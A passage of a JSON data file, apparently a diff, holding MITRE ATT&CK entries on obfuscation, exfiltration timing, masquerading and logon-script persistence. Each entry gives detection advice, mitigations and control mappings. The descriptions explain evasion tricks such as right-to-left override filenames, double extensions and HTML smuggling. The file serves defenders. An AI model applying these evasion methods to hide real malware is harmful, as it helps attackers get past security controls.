Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017) ", + "url": "https://attack.mitre.org/techniques/T1027", + "tactics": [ + "Defense Evasion" + ], + "detection": "Detection of file obfuscation is difficult unless artifacts are left behind by the obfuscation process that are uniquely detectable with a signature. If detection of the obfuscation itself is not possible, it may be possible to detect the malicious activity that caused the obfuscated file (for example, the method that was used to write, read, or modify the file on the file system). \n\nFlag and analyze commands containing indicators of obfuscation and known suspicious syntax such as uninterpreted escape characters like '''^''' and '''\"'''. Windows' Sysmon and Event ID 4688 displays command-line arguments for processes. Deobfuscation tools can be used to detect these indicators in files/payloads. (Citation: GitHub Revoke-Obfuscation) (Citation: FireEye Revoke-Obfuscation July 2017) (Citation: GitHub Office-Crackros Aug 2016) \n\nObfuscation used in payloads for Initial Access can be detected at the network. Use network intrusion detection systems and email gateway filtering to identify compressed and encrypted attachments and scripts. Some email attachment detonation systems can open compressed and encrypted attachments. Payloads delivered over an encrypted connection from a website require encrypted network traffic inspection. \n\nThe first detection of a malicious tool may trigger an anti-virus or other security tool alert. Similar events may also occur at the boundary through network IDS, email scanning appliance, etc. The initial detection should be treated as an indication of a potentially more invasive intrusion. The alerting system should be thoroughly investigated beyond that initial alert for activity that was not detected. Adversaries may continue with an operation, assuming that individual events like an anti-virus detect will not be investigated or that an analyst will not be able to conclusively link that event to other activity occurring on the network. ", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Command: Command Execution", + "File: File Creation", + "File: File Metadata", + "Process: Process Creation" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1027.001", + "name": "Obfuscated Files or Information: Binary Padding", + "url": "https://attack.mitre.org/techniques/T1027/001", + "description": "Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This can be done without affecting the functionality or behavior of a binary, but can increase the size of the binary beyond what some security tools are capable of handling due to file size limitations. \n\nBinary padding effectively changes the checksum of the file and can also be used to avoid hash-based blocklists and static anti-virus signatures.(Citation: ESET OceanLotus) The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.(Citation: VirusTotal FAQ) ", + "detection": "Depending on the method used to pad files, a file-based signature may be capable of detecting padding using a scanning or on-access based tool. When executed, the resulting process from padded files may also exhibit other behavior characteristics of being used to conduct an intrusion such as system and network information Discovery or Lateral Movement, which could be used as event indicators that point to the source file. ", + "mitigations": [] + }, + { + "tid": "T1027.002", + "name": "Obfuscated Files or Information: Software Packing", + "url": "https://attack.mitre.org/techniques/T1027/002", + "description": "Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018) \n\nUtilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, (Citation: Wikipedia Exe Compression) but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses. ", + "detection": "Use file scanning to look for known software packers or artifacts of packing techniques. Packing is not a definitive indicator of malicious activity, because legitimate software may use packing techniques to reduce binary size or to protect proprietary code.", + "mitigations": [ + { + "mid": "M1049", + "name": "Antivirus/Antimalware", + "description": "Use signatures or heuristics to detect malicious software.", + "url": "https://attack.mitre.org/mitigations/M1049" + } + ] + }, + { + "tid": "T1027.003", + "name": "Obfuscated Files or Information: Steganography", + "url": "https://attack.mitre.org/techniques/T1027/003", + "description": "Adversaries may use steganography techniques in order to prevent the detection of hidden information. Steganographic techniques can be used to hide data in digital media such as images, audio tracks, video clips, or text files.\n\n[Duqu](https://attack.mitre.org/software/S0038) was an early example of malware that used steganography. It encrypted the gathered information from a victim's system and hid it within an image before exfiltrating the image to a C2 server.(Citation: Wikipedia Duqu) \n\nBy the end of 2017, a threat group used Invoke-PSImage to hide [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands in an image file (.png) and execute the code on a victim's system. In this particular case the [PowerShell](https://attack.mitre.org/techniques/T1059/001) code downloaded another obfuscated script to gather intelligence from the victim's machine and communicate it back to the adversary.(Citation: McAfee Malicious Doc Targets Pyeongchang Olympics) ", + "detection": "Detection of steganography is difficult unless artifacts are left behind by the obfuscation process that are detectable with a known signature. Look for strings or other signatures left in system artifacts related to decoding steganography.", + "mitigations": [] + }, + { + "tid": "T1027.004", + "name": "Obfuscated Files or Information: Compile After Delivery", + "url": "https://attack.mitre.org/techniques/T1027/004", + "description": "Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)\n\nSource code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)", + "detection": "Monitor the execution file paths and command-line arguments for common compilers, such as csc.exe and GCC/MinGW, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior. The compilation of payloads may also generate file creation and/or file write events. Look for non-native binary formats and cross-platform compiler and execution frameworks like Mono and determine if they have a legitimate purpose on the system.(Citation: TrendMicro WindowsAppMac) Typically these should only be used in specific and limited cases, like for software development.", + "mitigations": [] + }, + { + "tid": "T1027.005", + "name": "Obfuscated Files or Information: Indicator Removal from Tools", + "url": "https://attack.mitre.org/techniques/T1027/005", + "description": "Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.\n\nA good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may modify the file to explicitly avoid that signature, and then re-use the malware.", + "detection": "The first detection of a malicious tool may trigger an anti-virus or other security tool alert. Similar events may also occur at the boundary through network IDS, email scanning appliance, etc. The initial detection should be treated as an indication of a potentially more invasive intrusion. The alerting system should be thoroughly investigated beyond that initial alert for activity that was not detected. Adversaries may continue with an operation, assuming that individual events like an anti-virus detect will not be investigated or that an analyst will not be able to conclusively link that event to other activity occurring on the network.", + "mitigations": [] + }, + { + "tid": "T1027.006", + "name": "Obfuscated Files or Information: HTML Smuggling", + "url": "https://attack.mitre.org/techniques/T1027/006", + "description": "Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.(Citation: HTML Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018)\n\nAdversaries may deliver payloads to victims that bypass security controls through HTML Smuggling by abusing JavaScript Blobs and/or HTML5 download attributes. Security controls such as web content filters may not identify smuggled malicious files inside of HTML/JS files, as the content may be based on typically benign MIME types such as text/plain and/or text/html. Malicious files or data can be obfuscated and hidden inside of HTML files through Data URLs and/or JavaScript Blobs and can be deobfuscated when they reach the victim (i.e. [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)), potentially bypassing content filters.\n\nFor example, JavaScript Blobs can be abused to dynamically generate malicious files in the victim machine and may be dropped to disk by abusing JavaScript functions such as msSaveBlob.(Citation: HTML Smuggling Menlo Security 2020)(Citation: MSTIC NOBELIUM May 2021)(Citation: Outlflank HTML Smuggling 2018)(Citation: nccgroup Smuggling HTA 2017)", + "detection": "Detection of HTML Smuggling is difficult as HTML5 and JavaScript attributes are used by legitimate services and applications. HTML Smuggling can be performed in many ways via JavaScript, developing rules for the different variants, with a combination of different encoding and/or encryption schemes, may be very challenging.(Citation: Outlflank HTML Smuggling 2018) Detecting specific JavaScript and/or HTML5 attribute strings such as Blob, msSaveOrOpenBlob, and/or download may be a good indicator of HTML Smuggling. These strings may also be used by legitimate services therefore it is possible to raise false positives.\n\nConsider monitoring files downloaded from the Internet, possibly by HTML Smuggling, for suspicious activities. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities.", + "mitigations": [] + } + ], + "mitigations": [ + { + "mid": "M1049", + "name": "Antivirus/Antimalware", + "description": "Use signatures or heuristics to detect malicious software.", + "url": "https://attack.mitre.org/mitigations/M1049" + }, + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + } + ], + "cumulative_score": 2.0860630160742857, + "adjusted_score": 2.0860630160742857, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [ + "10.1,10.2,10.7,13.2,13.7" + ], + "nist_controls": [ + "CM-2", + "CM-6", + "SI-2", + "SI-3", + "SI-4", + "SI-7" + ], + "process_coverage": true, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1029", + "name": "Scheduled Transfer", + "description": "Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability.\n\nWhen scheduled exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) or [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).", + "url": "https://attack.mitre.org/techniques/T1029", + "tactics": [ + "Exfiltration" + ], + "detection": "Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious. Network connections to the same destination that occur at the same time of day for multiple days are suspicious.", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Network Traffic: Network Connection Creation", + "Network Traffic: Network Traffic Flow" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + } + ], + "cumulative_score": 0.22819047619047617, + "adjusted_score": 0.22819047619047617, + "has_car": true, + "has_sigma": false, + "has_es_siem": false, + "has_splunk": false, + "cis_controls": [ + "13.3,13.8" + ], + "nist_controls": [ + "AC-4", + "CA-7", + "CM-2", + "CM-6", + "SC-7", + "SI-3", + "SI-4" + ], + "process_coverage": false, + "network_coverage": true, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1030", + "name": "Data Transfer Size Limits", + "description": "An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.", + "url": "https://attack.mitre.org/techniques/T1030", + "tactics": [ + "Exfiltration" + ], + "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). If a process maintains a long connection during which it consistently sends fixed size data packets or a process opens connections and sends fixed sized data packets at regular intervals, it may be performing an aggregate data transfer. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Network Traffic: Network Connection Creation", + "Network Traffic: Network Traffic Flow" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + } + ], + "cumulative_score": 0.23389523809523807, + "adjusted_score": 0.23389523809523807, + "has_car": false, + "has_sigma": true, + "has_es_siem": false, + "has_splunk": false, + "cis_controls": [ + "13.3,13.8" + ], + "nist_controls": [ + "AC-4", + "CA-7", + "CM-2", + "CM-6", + "SC-7", + "SI-3", + "SI-4" + ], + "process_coverage": false, + "network_coverage": true, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1033", + "name": "System Owner/User Discovery", + "description": "Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nVarious utilities and commands may acquire this information, including whoami. In macOS and Linux, the currently logged in user can be identified with w and who. On macOS the dscl . list /Users | grep -v '_' command can also be used to enumerate user accounts. Environment variables, such as %USERNAME% and $USER, may also be used to access this information.", + "url": "https://attack.mitre.org/techniques/T1033", + "tactics": [ + "Discovery" + ], + "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Command: Command Execution", + "Process: Process Creation" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [], + "cumulative_score": 0.4713513235895238, + "adjusted_score": 0.4713513235895238, + "has_car": true, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [], + "nist_controls": [], + "process_coverage": true, + "network_coverage": true, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1036", + "name": "Masquerading", + "description": "Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.\n\nRenaming abusable system utilities to evade security monitoring is also a form of [Masquerading](https://attack.mitre.org/techniques/T1036).(Citation: LOLBAS Main Site)", + "url": "https://attack.mitre.org/techniques/T1036", + "tactics": [ + "Defense Evasion" + ], + "detection": "Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.\n\nIf file names are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity. (Citation: Elastic Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update)\n\nLook for indications of common characters that may indicate an attempt to trick users into misidentifying the file type, such as a space as the last character of a file name or the right-to-left override characters\"\\u202E\", \"[U+202E]\", and \"%E2%80%AE”.", + "platforms": [ + "Containers", + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Command: Command Execution", + "File: File Metadata", + "File: File Modification", + "Image: Image Metadata", + "Process: Process Metadata", + "Scheduled Job: Scheduled Job Metadata", + "Scheduled Job: Scheduled Job Modification", + "Service: Service Creation", + "Service: Service Metadata" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1036.001", + "name": "Masquerading: Invalid Code Signature", + "url": "https://attack.mitre.org/techniques/T1036/001", + "description": "Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.(Citation: Threatexpress MetaTwin 2017)\n\nUnlike [Code Signing](https://attack.mitre.org/techniques/T1553/002), this activity will not result in a valid signature.", + "detection": "Collect and analyze signing certificate metadata and check signature validity on software that executes within the environment, look for invalid signatures as well as unusual certificate characteristics and outliers.", + "mitigations": [ + { + "mid": "M1045", + "name": "Code Signing", + "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.", + "url": "https://attack.mitre.org/mitigations/M1045" + } + ] + }, + { + "tid": "T1036.002", + "name": "Masquerading: Right-to-Left Override", + "url": "https://attack.mitre.org/techniques/T1036/002", + "description": "Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named March 25 \\u202Excod.scr will display as March 25 rcs.docx. A JavaScript file named photo_high_re\\u202Egnp.js will be displayed as photo_high_resj.png.(Citation: Infosecinstitute RTLO Technique)\n\nAdversaries may abuse the RTLO character as a means of tricking a user into executing what they think is a benign file type. A common use of this technique is with [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)/[Malicious File](https://attack.mitre.org/techniques/T1204/002) since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity.(Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber Crime) RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default.", + "detection": "Detection methods should include looking for common formats of RTLO characters within filenames such as \\u202E, [U+202E], and %E2%80%AE. Defenders should also check their analysis tools to ensure they do not interpret the RTLO character and instead print the true name of the file containing it.", + "mitigations": [] + }, + { + "tid": "T1036.003", + "name": "Masquerading: Rename System Utilities", + "url": "https://attack.mitre.org/techniques/T1036/003", + "description": "Adversaries may rename legitimate system utilities to try to evade security mechanisms concerning the usage of those utilities. Security monitoring and control mechanisms may be in place for system utilities adversaries are capable of abusing. (Citation: LOLBAS Main Site) It may be possible to bypass those security mechanisms by renaming the utility prior to utilization (ex: rename rundll32.exe). (Citation: Elastic Masquerade Ball) An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)", + "detection": "If file names are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity. (Citation: Elastic Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update)", + "mitigations": [ + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + } + ] + }, + { + "tid": "T1036.004", + "name": "Masquerading: Masquerade Task or Service", + "url": "https://attack.mitre.org/techniques/T1036/004", + "description": "Adversaries may attempt to manipulate the name of a task or service to make it appear legitimate or benign. Tasks/services executed by the Task Scheduler or systemd will typically be given a name and/or description.(Citation: TechNet Schtasks)(Citation: Systemd Service Units) Windows services will have a service name as well as a display name. Many benign tasks and services exist that have commonly associated names. Adversaries may give tasks or services names that are similar or identical to those of legitimate ones.\n\nTasks or services contain other fields, such as a description, that adversaries may attempt to make appear legitimate.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Fysbis Dr Web Analysis)", + "detection": "Look for changes to tasks and services that do not correlate with known software, patch cycles, etc. Suspicious program execution through scheduled tasks or services may show up as outlier processes that have not been seen before when compared against historical data. Monitor processes and command-line arguments for actions that could be taken to create tasks or services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.", + "mitigations": [] + }, + { + "tid": "T1036.005", + "name": "Masquerading: Match Legitimate Name or Location", + "url": "https://attack.mitre.org/techniques/T1036/005", + "description": "Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.\n\nAdversaries may also use the same icon of the file they are trying to mimic.", + "detection": "Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.\n\nIf file names are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity. (Citation: Elastic Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update)\n\nIn containerized environments, use image IDs and layer hashes to compare images instead of relying only on their names.(Citation: Docker Images) Monitor for the unexpected creation of new resources within your cluster in Kubernetes, especially those created by atypical users.", + "mitigations": [ + { + "mid": "M1045", + "name": "Code Signing", + "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.", + "url": "https://attack.mitre.org/mitigations/M1045" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + } + ] + }, + { + "tid": "T1036.006", + "name": "Masquerading: Space after Filename", + "url": "https://attack.mitre.org/techniques/T1036/006", + "description": "Adversaries can hide a program's true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system.\n\nFor example, if there is a Mach-O executable file called evil.bin, when it is double clicked by a user, it will launch Terminal.app and execute. If this file is renamed to evil.txt, then when double clicked by a user, it will launch with the default text editing application (not executing the binary). However, if the file is renamed to evil.txt (note the space at the end), then when double clicked by a user, the true file type is determined by the OS and handled appropriately and the binary will be executed (Citation: Mac Backdoors are back).\n\nAdversaries can use this feature to trick users into double clicking benign-looking files of any format and ultimately executing something malicious.", + "detection": "It's not common for spaces to be at the end of filenames, so this is something that can easily be checked with file monitoring. From the user's perspective though, this is very hard to notice from within the Finder.app or on the command-line in Terminal.app. Processes executed from binaries containing non-standard extensions in the filename are suspicious.", + "mitigations": [] + }, + { + "tid": "T1036.007", + "name": "Masquerading: Double File Extension", + "url": "https://attack.mitre.org/techniques/T1036/007", + "description": "Adversaries may abuse a double extension in the filename as a means of masquerading the true file type. A file name may include a secondary file type extension that may cause only the first extension to be displayed (ex: File.txt.exe may render in some views as just File.txt). However, the second extension is the true file type that determines how the file is opened and executed. The real file extension may be hidden by the operating system in the file browser (ex: explorer.exe), as well as in any software configured using or similar to the system’s policies.(Citation: PCMag DoubleExtension)(Citation: SOCPrime DoubleExtension) \n\nAdversaries may abuse double extensions to attempt to conceal dangerous file types of payloads. A very common usage involves tricking a user into opening what they think is a benign file type but is actually executable code. Such files often pose as email attachments and allow an adversary to gain [Initial Access](https://attack.mitre.org/tactics/TA0001) into a user’s system via [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) then [User Execution](https://attack.mitre.org/techniques/T1204). For example, an executable file attachment named Evil.txt.exe may display as Evil.txt to a user. The user may then view it as a benign text file and open it, inadvertently executing the hidden malware.(Citation: SOCPrime DoubleExtension)\n\nCommon file types, such as text files (.txt, .doc, etc.) and image files (.jpg, .gif, etc.) are typically used as the first extension to appear benign. Executable extensions commonly regarded as dangerous, such as .exe, .lnk, .hta, and .scr, often appear as the second extension and true file type.", + "detection": "Monitor for files written to disk that contain two file extensions, particularly when the second is an executable.(Citation: Seqrite DoubleExtension)", + "mitigations": [ + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + }, + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1045", + "name": "Code Signing", + "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.", + "url": "https://attack.mitre.org/mitigations/M1045" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + } + ], + "cumulative_score": 2.580761904761905, + "adjusted_score": 2.580761904761905, + "has_car": true, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [ + "2.5,2.7,3.3,4.1,6.1,6.2,6.8" + ], + "nist_controls": [ + "AC-2", + "AC-3", + "AC-6", + "CA-7", + "CM-2", + "CM-6", + "CM-7", + "IA-9", + "SI-10", + "SI-3", + "SI-4", + "SI-7" + ], + "process_coverage": true, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": true, + "hardware_coverage": false + }, + { + "tid": "T1037", + "name": "Boot or Logon Initialization Scripts", + "description": "Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence. Initialization scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. These scripts can vary based on operating system and whether applied locally or remotely. \n\nAdversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. \n\nAn adversary may also be able to escalate their privileges since some boot or logon initialization scripts run with higher privileges.", + "url": "https://attack.mitre.org/techniques/T1037", + "tactics": [ + "Persistence", + "Privilege Escalation" + ], + "detection": "Monitor logon scripts for unusual access by abnormal users or at abnormal times. Look for files added or modified by unusual accounts outside of normal administration duties. Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon.", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Active Directory: Active Directory Object Modification", + "Command: Command Execution", + "File: File Creation", + "File: File Modification", + "Process: Process Creation", + "Windows Registry: Windows Registry Key Creation" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1037.001", + "name": "Boot or Logon Initialization Scripts: Logon Script (Windows)", + "url": "https://attack.mitre.org/techniques/T1037/001", + "description": "Adversaries may use Windows logon scripts automatically executed at logon initialization to establish persistence. Windows allows logon scripts to be run whenever a specific user or group of users log into a system.(Citation: TechNet Logon Scripts) This is done via adding a path to a script to the HKCU\\Environment\\UserInitMprLogonScript Registry key.(Citation: Hexacorn Logon Scripts)\n\nAdversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. ", + "detection": "Monitor for changes to Registry values associated with Windows logon scrips, nameley HKCU\\Environment\\UserInitMprLogonScript.\n\nMonitor running process for actions that could be indicative of abnormal programs or executables running upon logon.", + "mitigations": [ + { + "mid": "M1024", + "name": "Restrict Registry Permissions", + "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.", + "url": "https://attack.mitre.org/mitigations/M1024" + } + ] + }, + { + "tid": "T1037.002", + "name": "Boot or Logon Initialization Scripts: Logon Script (Mac)", + "url": "https://attack.mitre.org/techniques/T1037/002", + "description": "Adversaries may use macOS logon scripts automatically executed at logon initialization to establish persistence. macOS allows logon scripts (known as login hooks) to be executed whenever a specific user logs into a system. A login hook tells Mac OS X to execute a certain script when a user logs in, but unlike [Startup Items](https://attack.mitre.org/techniques/T1037/005), a login hook executes as the elevated root user.(Citation: creating login hook)\n\nAdversaries may use these login hooks to maintain persistence on a single system.(Citation: S1 macOs Persistence) Access to login hook scripts may allow an adversary to insert additional malicious code. There can only be one login hook at a time though and depending on the access configuration of the hooks, either local credentials or an administrator account may be necessary. ", + "detection": "Monitor logon scripts for unusual access by abnormal users or at abnormal times. Look for files added or modified by unusual accounts outside of normal administration duties. Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon.", + "mitigations": [ + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + } + ] + }, + { + "tid": "T1037.003", + "name": "Boot or Logon Initialization Scripts: Network Logon Script", + "url": "https://attack.mitre.org/techniques/T1037/003", + "description": "Adversaries may use network logon scripts automatically executed at logon initialization to establish persistence. Network logon scripts can be assigned using Active Directory or Group Policy Objects.(Citation: Petri Logon Script AD) These logon scripts run with the privileges of the user they are assigned to. Depending 